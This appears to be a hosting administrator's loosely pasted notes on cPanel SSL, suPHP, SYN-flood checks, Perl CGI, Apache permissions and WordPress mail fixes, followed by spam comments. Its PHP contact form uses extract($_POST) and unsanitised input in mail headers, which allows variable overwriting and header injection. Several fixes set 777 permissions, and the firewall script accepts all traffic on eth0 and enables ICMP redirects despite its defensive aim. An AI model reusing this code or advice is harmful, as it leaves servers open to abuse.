certificate information will display. Copy the RSA private key output into a text file so that you are able to use your certificate. Save this information carefully. g. Click SSL Manager through SSL/TLS menu h. Click the floppy drive icon of the appropriate certificate signing request in the CSRS column. Your certificate request information will display. i. Get your cert signed using the certificate request information through SSL signing authority. The signing authority will send you a signed CRT and CA file. This file is referred to as an intermediate certificate or chaining file. Notes: 2 - SSL Certificate installation with cPanel WHM a.Open a Web browser and navigate to: https://serverIP:2086 b. Enter your root user name and the password you specified when you set up your account. c. Click OK. d. Click Install a SSL Certificate and Setup the Domain through Web SSL/TLS menu e. Paste your signed SSL certificate from the signing authority into the crt text box. f. Paste your RSA private key info saved from the previous procedure into the key text box. g. If received from the signing authority, paste the CA bundle (or intermediate certificate) into the ca text box. h. Confirm the domain, user, and IP address, and then click Do it. Notes: Notes about creating the procedures Adding a Rapid SSL logo on the home page, Just add the code given below to add the SSL logo inside index web page <a href="http://www.prontossl.com" target="_blank"><img style="border: 0;" src="https://www.prontossl.com/siteseal/rapidssl.gif" width="90" height="50" alt="Secured By RapidSSL from ProntoSSL" title="Secured By RapidSSL from ProntoSSL"></a> Also you can refer : http://www.prontossl.com/rapid 1001 [Oct/27/2010 - 12:51:53] cd /etc/ssl/private/ 1002 [Oct/27/2010 - 12:51:55] ll 1003 [Oct/27/2010 - 12:52:14] vi www.stephanieannasartshop.com.key.old.1287727551 >>>>>>>>>>>>>>>>>>Display Summary Statistics for Each Protocol Simply use netstat -s: # netstat -s | less # netstat -t -s | less # netstat -u -s | less # netstat -w -s | less # netstat -sServer Monitoring Commands : A : http://www.question-defense.com/2009/03/31/how-to-get-detailed-information-about-a-linux-pid-process-id How to Get Detailed Information About a Linux PID, Process ID To get detailed information about a Linux PID you can use the strace command. If strace is not installed it can be installed via yum using the command below. Strace Install: Use below commands to install strace command : ******* yum install strace *********** Below is a sample output from using the strace command on a Litespeed web server process. ============================================ To search process ID : ls -alh /proc/4846 |grep cwd root@white [~]# /usr/local/cpanel/bin/rebuild_phpconf --currenthttp://kmaiti.blogspot.com/2010/07/how-to-install-suphp-on-linux-server.html How to install suPHP on linux server? Guys, This is not my article. However, I have searched it in Google and got the results. I am pasting it only so that you can easily get it. ======================================= suPHP is a tool that allows PHP scripts to be executed with the permissions of their owners. By not running PHP script using web server’s user rights, suPHP increase the server security. First install httpd-devel and compiler tools: yum install httpd-devel gcc gcc-c++ make Download suPHP source code and extract it wget http://www.suphp.org/download/suphp-0.7.1.tar.gz tar -xvzf suphp-0.7.1.tar.gz cd suphp-0.7.1 Now we compile suPHP ./configure --with-apxs=/usr/sbin/apxs --with-apache-user=apache --with-logfile=/var/log/httpd/suphp_log --with-setid-mode=paranoid --sysconfdir=/etc --with-apr=/usr/bin/apr-1-config --with-php=/usr/bin/php-cgi --enable-SUPHP_USE_USERGROUP=yes make make install Next create suphp.conf to configure Apache so it will call suPHP for interpreting PHP scripts nano /etc/httpd/conf.d/suphp.conf Add this configuration: LoadModule suphp_module modules/mod_suphp.so suPHP_Engine on AddType application/x-httpd-php .php suPHP_AddHandler application/x-httpd-php Save the file and the next step is to disable mod_php configuration as we are now using suPHP mv /etc/httpd/conf.d/php.conf /etc/httpd/conf.d/php.conf.disabled After we finished with Apache configuration, next we create suphp.conf file which contain suPHP configuration nano /etc/suphp.conf and copy this to the new file: [global] ;Path to logfile logfile=/var/log/suphp.log ;Loglevel loglevel=info ;User Apache is running as webserver_user=apache ;Path all scripts have to be in docroot=/var/www:${HOME}/public_html ;Path to chroot() to before executing script ;chroot=/mychroot ; Security options allow_file_group_writeable=false allow_file_others_writeable=false allow_directory_group_writeable=false allow_directory_others_writeable=false ;Check wheter script is within DOCUMENT_ROOT check_vhost_docroot=true ;Send minor error messages to browser errors_to_browser=false ;PATH environment variable env_path=/bin:/usr/bin ;Umask to set, specify in octal notation umask=0077 ; Minimum UID min_uid=0 ; Minimum GID After Apache and suPHP is configured, we need to add suPHP_UserGroup option on each virtual hosting we hosted on the server. For example, the domain.com virtual host would look like: DocumentRoot /home/user/public_html allow from all Options +Indexes ServerName domain.com ErrorLog /var/log/httpd/domain.com LogLevel warn suPHP_UserGroup user user "user" should be replaced with the real username on your server who own the PHP scripts. Make sure all file owned by the "user" username otherwise you’ll get 500 error code (Internal Server Error). Now let's test the configuration service httpd configtest if everything is OK, restart the Apache server ======================================= Try :) http://webhostingsupport.info/suspend page can be due to .htaccess redirect code ============================================================= Check IP accessing servers for syn attack : netstat -an |grep SYN_RECV|awk '{print $5}' |sort|uniq netstat -plan |grep :80 | grep SYN | awk '{print $5}' |cut -d: -f1 |sort |uniq -c |sort -n netstat -n -p TCP http://24x7servermanagement.com/blog/?p=261 ============================================================= Stopping SYN Attacks using IPTables http://www.webhostingtalk.com/showthread.php?t=355411 ============================================================= Heres a bash script I made to stop SYN attacks on your server you need root, #!/bin/bash /sbin/modprobe ip_tables /sbin/modprobe ip_conntrack /sbin/modprobe ip_conntrack_ftp rm /root/.dyn* echo "Setting kernel tcp parameters to reduct DoS effects" #Reduce DoS'ing ability by reducing timeouts echo 30 > /proc/sys/net/ipv4/tcp_fin_timeout echo 1800 > /proc/sys/net/ipv4/tcp_keepalive_time echo 1 > /proc/sys/net/ipv4/tcp_window_scaling echo 0 > /proc/sys/net/ipv4/tcp_sack echo 1280 > /proc/sys/net/ipv4/tcp_max_syn_backlog #ANTISPOOFING for a in /proc/sys/net/ipv4/conf/*/rp_filter; do echo 1 > $a done ## #NO SOURCE ROUTE for z in /proc/sys/net/ipv4/conf/*/accept_source_route; do echo 0 > $z done #SYN COOKIES echo 1 > /proc/sys/net/ipv4/tcp_syncookies echo 1 > /proc/sys/net/ipv4/icmp_echo_ignore_broadcasts #echo $ICMP_ECHOREPLY_RATE > /proc/sys/net/ipv4/icmp_echoreply_rate echo "1" > /proc/sys/net/ipv4/icmp_ignore_bogus_error_responses echo "1" > /proc/sys/net/ipv4/conf/all/accept_redirects echo "1" > /proc/sys/net/ipv4/conf/all/log_martians # NUMBER OF CONNECTIONS TO TRACK echo "65535" > /proc/sys/net/ipv4/ip_conntrack_max # Set default policies /sbin/iptables -P INPUT ACCEPT /sbin/iptables -P OUTPUT ACCEPT /sbin/iptables -P FORWARD DROP /sbin/iptables -F /sbin/iptables -F INPUT /sbin/iptables -F OUTPUT /sbin/iptables -F FORWARD /sbin/iptables -F -t mangle /sbin/iptables -X /sbin/iptables -A INPUT -i lo -j ACCEPT /sbin/iptables -A INPUT -d 127.0.0.0/8 -j REJECT /sbin/iptables -A INPUT -i eth0 -j ACCEPT /sbin/iptables -A INPUT -m state --state INVALID -j DROP ### chains to DROP too many SYN-s ###### /sbin/iptables -N syn-flood /sbin/iptables -A syn-flood -m limit --limit 100/second --limit-burst 150 -j RETURN /sbin/iptables -A syn-flood -j LOG --log-prefix "SYN flood: " /sbin/iptables -A syn-flood -j DROP ======================================================================== call it syn.bash and then excute it, also replace /sbin/iptables to the path of the iptables program ========================================================================How to + extract + untar + unzip .tar.gz file on linux ? Guys, I refer following commands : Examples : ========= gzip -d guiderj_content.sql.gz tar -xvzf guiderj_content.sql.gz tar -jxvf eaccelerator-0.9.5.3.tar.bz2 ========= try :) TCP/UDP Port Numbers Port 21 –> TCP –> FTP (File Transfer Protocol) Port 22 –> TCP/UDP –> SSH (ssh,scp copy or sftp) Port 23 –> TCP/UDP –> Telnet Port 25 –> TCP/UDP –> SMTP (for sending outgoing emails) Port 43 –> TCP –> WHOIS function Port 53 –> TCP/UDP –> DNS Server (DNS lookup uses UDP and Zone transfers use TCP) Port 70 –> TCP –> Gopher Protocol Port 79 –> TCP –> Finger protocol Port 110 –> TCP –> POP3 (for receiving email) Port 119 –> TCP –> NNTP (Network News Transfer Protocol) Port 143 –> TCP/UDP –> IMAP4 Protocol (for email service) Port 194 –> TCP –> IRC Port 389 –> TCP/UDP –> LDAP (light weight directory access) Port 443 –> TCP –> Secure HTTP over SSL (https) Port 465 –> TCP –> Secure SMTP (email) using SSL Port 990 –> TCP/UDP –> Secure FTP using SSL Port 993 –> TCP –> Secure IMAP protocol over SSL (for emails) Port 1433 –> TCP/UDP –> Microsoft SQL server port Port 2082 –> TCP –> CPanel default port Port 2083 –> TCP –> CPanel over SSL Port 2086 –> TCP –> CPanel Webhost Manager (default) Port 2087 –> TCP –> CPanel Webhost Manager (with https) Port 2095 –> TCP –> CPanel Webmail Port 2096 –> TCP –> Cpanel secure webmail over SSL Port 2222 –> TCP –> DirectAdmin Server Control Panel Port 3306 –> TCP/UDP –> MySQL Database Server Port 4643 –> TCP –> Virtuosso Power Panel Port 5432 –> TCP –> PostgreSQL Database Server Port 8080 –> TCP –> HTTP port (alternative one for port 80) Port 8087 –> TCP –> Plesk Control Panel Port (default) Port 8443 –> TCP –> Plesk Server Control Panel over SSL Port 9999 –> TCP –> Urchin Web Analytics Port 10000 –> TCP –> Webmin Server Control Panel Port 19638 –> TCP –> Ensim Server Control Panel http://www.bookrags.com/wiki/List_of_TCP_and_UDP_port_numbers astra kernel: CPU2: Temperature above threshold root@astra [~]# cat /var/log/messages | grep Temperature | wc -lhttp://www.webmasterworld.com/perl/3099327.htm #!/usr/bin/perl # # =========== # helloworld.pl # =========== # print "content-type:text/html\n\n"; print "<html>\n"; print "<head>\n"; print "<title>Hello World</title>\n"; print "</head>\n"; print "<body>\n"; print "<b>Hello World!</b><br>\n"; print "</body>\n"; print "</html>\n"; # # Script starts at line starting with #!/usr/bin/perl, cut and paste to a text editor and save file as helloworld.pl 1. upload perl file to the /cgi-bin/ folder on your server, (use FTP and upload as ASCII text) 2. set the permissions for the file to 755, (CHMOD 755) 3. enter URL http://www.yourdomain.com/cgi-bin/helloworld.pl in browser 4. if it says Hello World! perl is working. ************************************************************************************* http://encodable.com/internal_server_error/ 500 Internal Server Error for cgi pearl scrpt. ...and how to fix it. When running a Perl CGI script, you may see the "Internal Server Error" message in your browser. The message will usually also say something like "please check the server's error-log for more information." You should do that -- the message printed to the error log will often tell you exactly what the problem is. The Apache error log, for example, is often located at /var/log/apache/error_log or /var/log/apache2/error_log (or sometimes "error.log"). If you don't have access to the error log, the next simplest thing to do is to make a copy of the script, then open the original and delete all of its contents, and add just these 3 lines to the file: #!/usr/bin/perl print "Content-type: text/plain\n\n"; print "testing...\n"; (Note: if the server is a Windows system, then replace the first line above with either #!perl or #!c:\path\to\perl.exe.) Now try to access the page in your browser again. If it works (you see "testing..." as its output) then you know that your server is at least configured properly for running Perl CGI scripts. If it doesn't work, then that may mean the problem is in the server configuration, rather than with your CGI script. (For example, are you sure you actually have Perl installed? Virtually all UNIX/Linux/OS X servers do, but Windows servers usually need to have it installed manually, from a package like ActivePerl.) Assuming your server is configured properly for running CGI scripts, your problem may be one of these common causes for the Internal Server Error: <html xmlns="http://www.w3.org/1999/xhtml"> <head> <meta http-equiv="Content-Type" content="text/html; charset=utf-8" /> <title>HTML Mail Form</title> </head> <body> <form action="send_mail.php" method="post"> Name: <input type="text" name="name" size="30" /><br /> Email: <input type="text" name="email" size="30"/><br /> Subject: <input type="text" name="subject" size="30"/><br /> Text:<textarea name="text" name="text" cols="50" rows="10"></textarea><br /> <input type="submit" name="submit" value="Send" /> </form> </body> </html> Save it As: contact_us.html Create a new file and insert the following code: <?php @extract($_POST); $name = stripslashes($name); $email = stripslashes($email); $subject = stripslashes($subject); $text = stripslashes($text); mail(' youremail@domain.com',$subject,$text,"From: $name <$email>"); echo("Thank you for your interest, your e-mail was sent."); ?> Save it As: send_mail.php replace the youremail@domain.com with the email id. Problem: Troubleshooting Your Web Page Entry: 0288 Solution: If you're having trouble accessing your pages via the Prism web server, here are some possible symptoms and solutions. • Symptom: Error code 404: File Not found • Symptom: Error code 403: Forbidden • Symptom: Error code 200: Forbidden • Symptom: Enter username for PageTestAccess at www.prism.gatech.edu: • Symptom: Error code 401: Authorization Required ________________________________________ • Symptom: Error code 404: File Not found, The requested URL /~gt9999z/ was not found on this server. o Possible reason: Your Prism home directory (~) does not have adequate unix file permissions to allow the server to access your web pages. The minimum file permissions required for directories are world ("other") execute permissions. Solution: Add execute permission to your Prism home directory: chmod o+x ~ o Possible reason: Your ~/public_html directory does not exist. Solution: Create your public_html directory, and give it the required permissions: mkdir ~/public_html chmod o+x ~/public_html • Symptom: Error code 403: Forbidden, You don't have permission to access /~gt9999z/ on this server. o Possible reason: Your home directory does not have adequate unix file permissions to allow the server to access your web pages. The minimum file permissions required for directories are world ("other") execute permissions. Solution: Add execute permission to your home directory: chmod o+x ~ o Possible reason: Your ~/public_html directory does not have adequate unix file permissions to allow the server to access your web pages. The minimum file permissions required for directories are world ("other") execute permissions. Solution: Add execute permission to your ~/public_html directory: chmod o+x ~/public_html o Possible reason: You have a .htaccess file that does not have adequate unix file permissions. The file needs to be world-readable. Solution: Chmod the .htaccess file to give it the required permissions: chmod o+r ~/public_html/.htaccess ~/.htaccess Or more completely: chmod o+r `find ~ -name .htaccess -print` o Possible reason: The index file for your web pages, "index.html", does not exist. Solution: Create your main index.html file, and give it the required permissions: touch ~/public_html/index.html chmod o+r ~/public_html/index.html • Symptom: Error code 200: Forbidden, You don't have permission to access /~gt1234a/index.html on this server. o Possible reason: Your index.html file does not have adequate unix file permissions to allow the server to read the file. The minimum file permissions required for files are world ("other") read permissions. Solution: Add read permission to your index.html file: chmod o+r ~/public_html/index.html • Symptom: Enter username for PageTestAccess at www.prism.gatech.edu: • Symptom: Error code 401: Authorization Required, This server could not verify that you are authorized to access the document you requested. Either you supplied the wrong credentials (e.g., bad password), or your browser doesn't understand how to supply the credentials required. o Possible reason: You have unneeded Auth* directives in your ~/public_html/.htaccess file. Solution: Rename or remove the .htaccess file, or remove the Auth* directives from the .htaccess file: cd ~/public_html mv .htaccess htaccess.old sed "/^Auth/d" htaccess.old > .htaccess o Possible reason: You have a .htaccess file in your Prism home directory with unneeded Auth* directives. Solution: Rename or remove the .htaccess file, or remove the Auth* directives from the .htaccess file: cd ~ mv .htaccess htaccess.old sed "/^Auth/d" htaccess.old > .htaccess To use rar we need unrar installed on server. Login as Root: at / run the following command: wget http://dag.wieers.com/packages/unrar/unrar-3.6.2-1.el4.rf.i386.rpm check the .rpm file here and then run the following command to install rpm -ivh unrar-3.6.2-1.el4.rf.i386.rpm Now unrar is installed. Use following command to unrar the .rar file unrar e -kb rarfile.rarUpgrade wordpress : http://codex.wordpress.org/Upgrading_WordPress Download the wordpress zip file : http://wordpress.org/download/ ==================================================================== WORDPRESS UPGRADE : - Please follow the instruction for upgrading your wordpress, Backup your database. Read Backing Up Your Database for a detailed explanation. Backup ALL your WordPress files in your WordPress directory. Don't forget your .htaccess file. Verify the backups you created are there and usable. This is essential. Deactivate ALL your Plugins. Ensure first four steps are completed. Do not attempt the upgrade unless you have completed the first four steps. Download and extract the WordPress package from http://wordpress.org/download/. Delete the old WordPress files on your site, but DO NOT DELETE wp-config.php file; wp-content folder; Special Exception: the wp-content/cache and the wp-content/plugins/widgets folders should be deleted. wp-images folder; wp-includes/languages/ folder--if you are using a language file do not delete that folder; .htaccess file--if you have added custom rules to your .htaccess, do not delete it; robots.txt file--if your blog lives in the root of your site (ie. the blog is the site) and you have created such a file, do not delete it. Upload the new files from your computer's hard drive to the appropriate WordPress folder on your site. Run the WordPress upgrade program and follow the instructions on the screen. Update Permalinks and .htaccess. Update your Permalink Structure and merge the custom rules, if necessary, into your .htaccess file. Install updated Plugins and Themes. Please review the list of Plugins that work in Version 2.8.4. Check for Theme Compatibility with 2.8.4 and ask your Theme author for any new version. Reactivate Plugins Add security key definitions to the wp-config.php file Review what has changed in WordPress. That's the overview of the upgrade process. Please continue reading the Detailed Upgrade Instructions.Unable to create directory /wp-content/uploads/2009/09. Is its parent directory writable by the server? The parent directory is 2009 and uploads is ’super’ parent directory (if I can call it that way). Both the directories had 777 permission so there was nothing wrong with the permission settings. The problem was not with the directory permissions, but it was with URL where WordPress was trying to upload the image. On my previous server, I had the blog in a folder named ‘tech’ and in the new server I had renamed it as ‘technology’. Since I had moved the complete blog to the new server, the upload path was pointing to : /home/tech/public_html/wp-content/uploads/2009/09 instead of pointing to /home/technology/public_html/wp-content/uploads/2009/09 Do you notice the source of the problem ? How can you fix it ? SOLUTION : Simple, Login to your Blog as admin, go to Miscellaneous under Settings. You’ll find the option “Store uploads in this folder” Set it to default which is “wp-content/uploads“, unless u specifically want the content in some other folder. This should solve your problem ! There is a more complicated way of changing the file upload path of your wordpress blog, this is recommended only for those who know how to handle wp-config file ! For this you’ll have to modify wp-config.php file. Add below mentioned code before require_once(ABSPATH.’wp-settings.php’); code in your wp-config file define(’UPLOADS’, ‘wp-content/new_folder’); Once you save this new configuration all your uploaded files will go to the ‘new_folder’ under wp-content directory. *************************************************************************************************************** OR : image upload error go to admin area : new posts and try to add the new posts by adding the image you will get the following error Unable to create directory / Is its parent directory writable by the server? Ex. Error : Unable to create directory /home/kinsey/public_html/wordpress/wp-content/uploads/2009/09. Is its parent directory writable by the server? Solution : 1. Set 777 permissions recursiveyy for upload/ folder only If still getting the error then 2. Go to Miscellaneous Settings from admin area Go to miscellaneous settings and uncheck the option "Organize my uploads into month- and year-based folders" and try uploading images. and also set the path as : wp-content/uploads at Store uploads in this folder. http://oldfield.wattle.id.au/luv/boot.html http://comptechdoc.org/os/linux/commands/linux_crcredits.html http://tille.garrels.be/training/tldp/ch03s02.htmlhttp://oldfield.wattle.id.au/luv/boot.html http://comptechdoc.org/os/linux/commands/linux_crcredits.html http://tille.garrels.be/training/tldp/ch03s02.htmlhttp://oldfield.wattle.id.au/luv/boot.html http://comptechdoc.org/os/linux/commands/linux_crcredits.html http://tille.garrels.be/training/tldp/ch03s02.html/var/cpanel/userdata/usernamecreate a folder called mysql in home, move big dbs there and create symlinks in /var/lib/mysql for those dbs [11:23:08 AM] vulgar: create a folder called mysql in home, move big dbs there and create symlinks in /var/lib/mysql for those dbs [11:23:20 AM] APS-3: okay [11:23:49 AM] vulgar: find /var/lib/mysql -name "*" -size +100000k [11:23:54 AM] vulgar: you can find big dbs [11:24:01 AM] vulgar: do nothing to ibdata1 file How to create symlink >> ln -s /home/mysql/database_name database_name Ex. ln -s /home/mysql/maxihebe_forum maxihebe_forum Viewing webalizer stats without login to cPanel cd /home/username/www ln -s ../tmp/webalizer stats chown username.username stats cd ../tmp chmod 755 ./ chmod 755 ./webalizer This will allow http://domain.com/stats/ for viewing stats without logging in to cpanel<VirtualHost 66.7.221.11:80> <IfModule concurrent_php.c> php4_admin_value open_basedir "/home/greenorc/:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp" php5_admin_value open_basedir "/home/greenorc/:/usr/lib/php:/usr/local/lib/php:/tmp" </IfModule> <IfModule !concurrent_php.c> <IfModule mod_php4.c> php_admin_value open_basedir "/home/greenorc/:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp" </IfModule> <IfModule mod_php5.c> php_admin_value open_basedir "/home/greenorc/:/usr/lib/php:/usr/local/lib/php:/tmp" </IfModule> <IfModule sapi_apache2.c> php_admin_value open_basedir "/home/greenorc/:/usr/lib/php:/usr/php4/lib/php:/usr/local/lib/php:/usr/local/php4/lib/php:/tmp" </IfModule> </IfModule> <IfModule mod_userdir.c> UserDir disabled UserDir enabled greenorc </IfModule> ServerName greenorclean.com ServerAlias greenorclean.com www.greenorclean.com ServerAdmin webmaster@greenorclean.com DocumentRoot /home/greenorc/public_html/ UseCanonicalName off <IfModule mod_suphp.c> suPHP_UserGroup greenorc greenorc </IfModule> <IfModule !mod_disable_suexec.c> User greenorc Group greenorc </IfModule> BytesLog /usr/local/apache/domlogs/greenorclean.com-bytes_log CustomLog /usr/local/apache/domlogs/greenorclean.com combined ScriptAlias /cgi-bin/ /home/greenorc/public_html/cgi-bin/ # To customize this VirtualHost use an include file at the following location # Include "/usr/local/apache/conf/userdata/greenorc/greenorclean.com/*.conf" </VirtualHost> http://www.webhostingtalk.com/showthread.php?t=397457 /scripts/whoowns almco.biz cd ~almcobiz/public_html pico .htacess write the below lne : Options +FollowSymLinks and save the file. ln -s ~almcobiz/tmp/webalizer stats >>>> this will create stats file cd .. chmod 755 tmp/ chmod 755 tmp/webalizer EX. root@vip [/home/almcobiz]# chmod 755 tmp/ root@vip [/home/almcobiz]# chmod 755 tmp/webalizer # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress# -FrontPage- IndexIgnore .htaccess */.??* *~ *# */HEADER* */README* */_vti* <Limit GET POST> order deny,allow deny from all allow from all </Limit> <Limit PUT DELETE> order deny,allow deny from all </Limit> AuthName thegamedruid.com AuthUserFile /home/thegamed/public_html/_vti_pvt/service.pwd AuthGroupFile /home/thegamed/public_html/_vti_pvt/service.grp # BEGIN WordPress <IfModule mod_rewrite.c> RewriteEngine On RewriteBase / RewriteCond %{REQUEST_FILENAME} !-f RewriteCond %{REQUEST_FILENAME} !-d RewriteRule . /index.php [L] </IfModule> # END WordPress http://codex.wordpress.org/Changing_File_Permissionswordpress mu http://codex.wordpress.org/Create_A_NetworkWordpress site getting redirected : How to remove the redirection ? Edit wp-config.php It should be possible to fix the site URL using a new feature - Add these two lines to your wp-config.php, where "example.com" is the NEW location of your site. Add these two lines to the file, immediately after the initial "<?php" line. define('WP_HOME','http://example.com'); define('WP_SITEURL','http://example.com'); Use your own URL instead of example.com, obviously. ************************************************************************ http://codex.wordpress.org/Changing_The_Site_URL http://wordpress.org/support/WP Mail SMTP Installing plugins and setting up mails This plugin reconfigures the wp_mail() function to use SMTP instead of mail() and creates an options page that allows you to specify various options. You can set the following options: * Specify the from name and email address for outgoing email. * Choose to send mail by SMTP or PHP's mail() function. * Specify an SMTP host (defaults to localhost). * Specify an SMTP port (defaults to 25). * Choose SSL / TLS encryption (not the same as STARTTLS). * Choose to use SMTP authentication or not (defaults to not). * Specify an SMTP username and password. ******************************************************************************************************************* Solution no 2 : Wordpress not Sending Email Try This Fix http://annanta.com/archive/wordpress-not-sending-email-try-this-fix/ If you are not receiving any notification adn e-mail from your WordPress blog, or the PHP mail() function isn’t working, or SMTP isn’t working, here is your solution. Yes, this is guaranteed to work, even if you’re using Google mail application. Method 1 : If you are using c-panel and if you have signed up with google mail application then login to your C-panel and find the option MX Entry. Make sure that your setting is same as shown in image below Method 2 : Go to your hosting cpanel and create this emailaccount: wordpress@yourdomain.com. Replace “yourdomain.com” with whatever your domain name is. Make sure that if you have a .net, that you use .net instead of .com in that email. Set up your username and password and remember it. Download WP-Mail-SMTP or Cimy Swift SMTP. Just pick one of these and install and activate the plugin. Configure your SMTP plugin under Settings or Tools in your sidebar. This is the most important step! Do not fill in this info with what Gmail tells you to put in. Do the following instead: Sender e-mail must be: the new email account you created in your hosting cpanel. Put in the full wordpress@yourdomain.com in there. If there is a checkbox to use SMTP, check it. SMTP server address will be: mail.yourdomain.com. Replace “yourdomain.com” with your domain name again. Port will be 25 or 26. Try those before trying 456 for gmail. Contact your hosting provider if neither works. The chances of neither of these working are small. Username would be: wordpress@yourdomain.com. Replace “yourdomain.com” with your domain name again. Password is the password for that account. Set SSL or TLS to no or no encryption. Try these before using TLS for gmail. Contact your hosting provider in case they require encryption, if this doesn’t work. Wordpress@yourdomain.com will now send the email to your personal account. Make sure that the email on your profile is correct, whether it’s yahoo, hotmail, gmail or any other account. If you are using a contact form, make sure that the email is set to your personal account, as well. The emails should now go to your spam or inbox. If it still doesn’t work, you can have your wordpress@yourdomain.com send the email to itself and have your personal account pop forward it. Read the following if you are still having problems. Gmail is used as an example because most people have problems getting it to agree with their wordpress/hosting. Make sure that the email on your profile is changed to the wordpress@yourdomain.com email. If you are using a contact form, make sure that the emails are sent to the wordpress@yourdomain.com email. *This is important because wordpress and Gmail conflict and this is the only workaround I’ve come up with. Now, wordpress is set up to use SMTP to send emails out with your wordpress@yourdomain.com email. Step 5a makes sure that all the emails are sent to that same account. So basically, wordpress@yourdomain.com will send emails to itself. Now login to Gmail and go to Settings. Under Settings, go to Accounts. Under “Get mail from other accounts,” go to “Add a mail account you own”. Username is wordpress@yourdomain.com. Replace “yourdomain.com” with your domain name. Password is wordpress@yourdomain.com’s password. POP Server should be mail.yourdomain.com. Replace “yourdomain.com” with your domain name. Port should be 110. Click Save Changes. Now, WordPress will send the emails to the hosting server email account. And Gmail will fetch them. You could also create a Yahoo or Hotmail account and skip step 5 entirely, and then have Yahoo or Hotmail forward those emails to Gmail. If you are still having problems, or need assistance, leave a comment or contact us by visiting Contact Us page. When I register a new account for my wordpress blog, it does not sending verifcation email which contains password . I checked the wordpress.org support forums and found that the issue may be with the provider. I used Fantastico to install WordPress. I have configured WP so that anyone can register. The problem is that when someone registers it sends them an email with their initial password. New users are not receiving this email. Solution is : just create the email id like wordpress@myaddondomain.com ex. wordpress@socialweird.com ********************************************************************************************************************* http://www.roblayton.net/archive/wordpress-not-sending-emails-anymore-solved/ Okay, for anybody who just upgraded WordPress, only to realize you’re not getting notification emails anymore, or the PHP mail() function isn’t working, or SMTP isn’t working, here is your solution. Yes, this is guaranteed to work, even if you’re using Gmail. 1. Go to your hosting cpanel and create this email account: wordpress@yourdomain.com. Replace “yourdomain.com” with whatever your domain name is. Make sure that if you have a .net, that you use .net instead of .com in that email. Set up your username and password and remember it. 2. Download WP-Mail-SMTP or Cimy Swift SMTP. Just pick one of these and install and activate the plugin. 3a. Configure your SMTP plugin under Settings or Tools in your sidebar. This is the most important step! Do not fill in this info with what Gmail tells you to put in. Do the following instead: 3b. Sender e-mail must be: the new email account you created in your hosting cpanel. Put in the full wordpress@yourdomain.com in there. 3c. If there is a checkbox to use SMTP, check it. 3d. SMTP server address will be: mail.yourdomain.com. Replace “yourdomain.com” with your domain name again. 3e. Port will be 25 or 26. Try those before trying 456 for gmail. Contact your hosting provider if neither works. The chances of neither of these working are small. 3f. Username would be: wordpress@yourdomain.com. Replace “yourdomain.com” with your domain name again. 3g. Password is the password for that account. 3h. Set SSL or TLS to no or no encryption. Try these before using TLS for gmail. Contact your hosting provider in case they require encryption, if this doesn’t work. 4. WordPress@yourdomain.com will now send the email to your personal account. Make sure that the email on your profile is correct, whether it’s yahoo, hotmail, gmail or any other account. If you are using a contact form, make sure that the email is set to your personal account, as well. The emails should now go to your spam or inbox. If it still doesn’t work, you can have your wordpress@yourdomain.com send the email to itself and have your personal account pop forward it. Read the following if you are still having problems. Gmail is used as an example because most people have problems getting it to agree with their wordpress/hosting. 5a. Make sure that the email on your profile is changed to the wordpress@yourdomain.com email. If you are using a contact form, make sure that the emails are sent to the wordpress@yourdomain.com email. *This is important because wordpress and Gmail conflict and this is the only workaround I’ve come up with. 5b. Now, wordpress is set up to use SMTP to send emails out with your wordpress@yourdomain.com email. Step 5a makes sure that all the emails are sent to that same account. So basically, wordpress@yourdomain.com will send emails to itself. 5c. Now login to Gmail and go to Settings. 5d. Under Settings, go to Accounts. 5e. Under “Get mail from other accounts,” go to “Add a mail account you own”. 5f. Username is wordpress@yourdomain.com. Replace “yourdomain.com” with your domain name. 5g. Password is wordpress@yourdomain.com’s password. 5h. POP Server should be mail.yourdomain.com. Replace “yourdomain.com” with your domain name. 5i. Port should be 110. 5j. Click Save Changes. 6. Now, WordPress will send the emails to the hosting server email account. And Gmail will fetch them. You could also create a Yahoo or Hotmail account and skip step 5 entirely, and then have Yahoo or Hotmail forward those emails to Gmail. If you are still having problems, or need assistance, leave a comment. And good luck. Read the comments below to see the additional strides taken by other members to get this working on different hosting providers. One noteworthy contribution comes from Mario J. Vargas. Read his article by clicking here. Another one comes from Annanta: I am sure nothing will work until you fix it in your C-panel setting.Its not WordPress problem but its your domain localhost setting problem. Dont blame WordPress. Find [the] solution here: http://annanta.com/web-world/wordpress-not-sending-email-try-this-fix/ ********************************************************************************************************************* Once you install wp-smtp plugin you have to set following values : From From Email: wordpress@socialweird.com (ex.emaild id) From Name: SocialWeird Mailer: 1. Send all WordPress emails via SMTP. 2. Use the PHP mail() function to send emails select : Use the PHP mail() function to send emails SMTP Options These options only apply if you have chosen to send mail by SMTP above. SMTP Host: localhost SMTP Port: 25 Encryption: Use TLS encryption. This is not the same as STARTTLS. For most servers SSL is the recommended option Authentication: Yes: Use SMTP authentication. Username: wordpress@socialweird.com Password : wordpress update options : and try to send an test email. it will work for you. reset wordpress admin password http://digwp.com/2009/10/five-ways-to-change-your-wordpress-password/http://gggeek.raprap.it/debugger/ XMLRPC /JSONRPC Debugger (based on the PHP-XMLRPC library) yabb.pl issue can be resolved just by setting 755 permissions recursively.yahoo spam You can create disposable addresses to use whenever you don't want to share your real Yahoo! Mail address. You will receive all messages sent to the disposable address - you can set up a filter in Filter Options if you want these messages delivered to a personal folder rather than your Inbox. Your 'Control SpamGuard' setting in Spam Options controls whether or not any messages Yahoo! Mail thinks are spam are delivered to your Spam folder. This setting applies to your disposable addresses as well. However, if any one of your disposable addresses starts receiving spam, just delete that address. Click the 'Add Address' button above to startInstall zend : http://downloads.zend.com/optimizer/3.2.0/ZendOptimizer-3.2.0-linux-glibc21-i386.tar.gz http://downloads.zend.com/optimizer/3.3.3/ZendOptimizer-3.3.3-freebsd6.0-i386.tar.gz http://downloads.zend.com/optimizer/3.3.3/ZendOptimizer-3.3.3-linux-glibc23-i386.tar.gz
When the against in the U.S.?
I really like reading through a post that will make
men and women think. Also, thanks for allowing me to comment!
Good answers in return of this question with solid arguments and telling all regarding that.
I am truly happy to read this blog posts which contains lots of valuable information, thanks for
providing such information.
Can I just say what a comfort to uncover an individual who really understands what they are discussing on the
internet. You definitely understand how to bring a problem to light and make it important.
More people really need to read this and understand
